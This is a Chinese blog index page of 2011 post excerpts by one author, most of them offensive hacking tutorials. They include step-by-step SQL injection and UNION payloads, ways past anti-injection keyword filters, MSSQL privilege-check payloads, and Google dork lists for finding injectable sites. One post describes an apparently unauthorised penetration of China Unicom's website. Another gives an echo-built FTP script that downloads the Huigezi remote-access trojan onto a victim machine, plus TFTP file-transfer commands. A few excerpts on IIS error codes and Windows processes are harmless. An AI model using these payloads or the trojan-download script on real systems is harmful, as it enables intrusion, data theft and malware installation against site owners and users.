上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页
摘要: 1.判断是否存在注入,加';and 1=1;and 1=2 2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询 3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10 4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。 5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.us 阅读全文
posted @ 2011-06-01 10:30 WHaa_(T_T) 阅读(310) 评论(0) 推荐(0) 编辑
摘要: 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 对于关键字的过滤,以下是我收集的以及我个人的一些想法。 1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即 %6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CH... 阅读全文
posted @ 2011-06-01 10:14 WHaa_(T_T) 阅读(789) 评论(7) 推荐(0) 编辑
摘要: 对中国联通的一次渗透对中国联通网站的一次安全渗透测试。下面我将渗透测试的过程详细的写出来,以供新手朋友学习。水平还停留在完全依赖黑客工具入侵的朋友可要努力了。渗透之前的信息刺探的少不了的,但是我这里就不用大型黑客扫描软件,因为大型扫描软件发送大量的数据包,容易阻塞网络,有时候要视情况而定。那我们直接从WEB系统下手。打开联通的站点,站点做点做的很漂亮。一看程序是JSP的,意料之内,因为很多大型站点都爱用JSP构架的。打开谷歌搜索引擎,收集该站的动态页面。然后逐个测试每个动态连接看是否存在注入漏洞。经过我的仔细检测终于有所发现。这个地址链接是城市专栏的地址,提交一个单引号立即报错了。然后用经典的 阅读全文
posted @ 2011-05-31 10:07 WHaa_(T_T) 阅读(406) 评论(0) 推荐(0) 编辑
摘要: //看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --数字类型and char(124)% 阅读全文
posted @ 2011-05-31 08:11 WHaa_(T_T) 阅读(583) 评论(0) 推荐(1) 编辑
摘要: inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:pageid=inurl:games.php?id=inurl:page.php?file=inurl:newsDetail.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:show.php?id=inurl:staff_id=inurl:newsitem.php?num=inu 阅读全文
posted @ 2011-05-31 07:10 WHaa_(T_T) 阅读(758) 评论(0) 推荐(0) 编辑
摘要: 400无法解析此请求。401.1未经授权:访问由于凭据无效被拒绝。401.2未经授权:访问由于服务器配置倾向使用替代身份验证方法而被拒绝。401.3未经授权:访问由于ACL对所请求资源的设置被拒绝。401.4未经授权:Web服务器上安装的筛选器授权失败。401.5未经授权:ISAPI/CGI应用程序授权失败。401.7未经授权:由于Web服务器上的URL授权策略而拒绝访问。403禁止访问:访问被拒绝。403.1禁止访问:执行访问被拒绝。403.2禁止访问:读取访问被拒绝。403.3禁止访问:写入访问被拒绝。403.4禁止访问:需要使用SSL查看该资源。403.5禁止访问:需要使用SSL128查 阅读全文
posted @ 2011-05-31 00:09 WHaa_(T_T) 阅读(334) 评论(0) 推荐(0) 编辑
摘要: 操作系统进程描述system process进程文件: [system process] or [system process]进程名称: Windows内存处理系统进程描述: Windows页面内存管理进程,拥有0级优先。是否为系统进程: 是 alg.exe进程文件: alg or alg.exe进程名称: 应用层网关服务描述: 这是一个应用层网关服务用于网络共享。是否为系统进程: 是csrss.exe进程文件: csrss or csrss.exe进程名称: Client/Server Runtime Server Subsystem描述: 客户端服务子系统,用以控制Windows图形相关 阅读全文
posted @ 2011-05-30 05:37 WHaa_(T_T) 阅读(194) 评论(0) 推荐(0) 编辑
摘要: 1、FTP服务器的IP地址:如203.75.44.342、FTP服务器的用户名:如tty3、FTP服务器的密 码:如tty123在远程计算机的CMD下依次输入下面的命令:1、echo open 203.75.44.34>>tty.txt 登陆FTP服务器2、echo tty>>tty.txt 用户名3、echo tty123>>tty.txt 密码4、echo bin>>tty.txt 开始5、echo get mhgz.exe>>tty.txt 下载灰鸽子木马6、echo bye>>tty.txt 关闭FTP服务器输入上 阅读全文
posted @ 2011-05-30 05:17 WHaa_(T_T) 阅读(1487) 评论(0) 推荐(0) 编辑
摘要: 在自已的机器上面运行TFTP后,把要上传 的文件复制到和TFTP同一个目录下,在对方机器上的c:\\winnt\\system32下打入指令,其他目录下也行,tftp -i 自已的IP get 要上传的程序,就实现了上传程序的目的,要下载到自已的机器上的话,只要把那条语的get改成put就行tftp -i 自已的IP put 要下载的程序 阅读全文
posted @ 2011-05-30 05:09 WHaa_(T_T) 阅读(318) 评论(0) 推荐(0) 编辑
摘要: 目标网站;http://www.xxx.com/可注入页面;http://www.xxx.com/CompHonorBig.asp?id=45猜表名 and (select count(*) from 表名)>0猜列名 and (select count(列名) from *)>0猜表段:xor exists (select * from *)猜字段数:order by 10 5个字段xor 1=2 union select 1,2,3 from adminhttp://www.xxx.com/CompHonorBig.asp?id=45 xor 1=2 union select 阅读全文
posted @ 2011-05-30 03:55 WHaa_(T_T) 阅读(229) 评论(0) 推荐(0) 编辑
上一页 1 ··· 5 6 7 8 9 10 11 12 13 下一页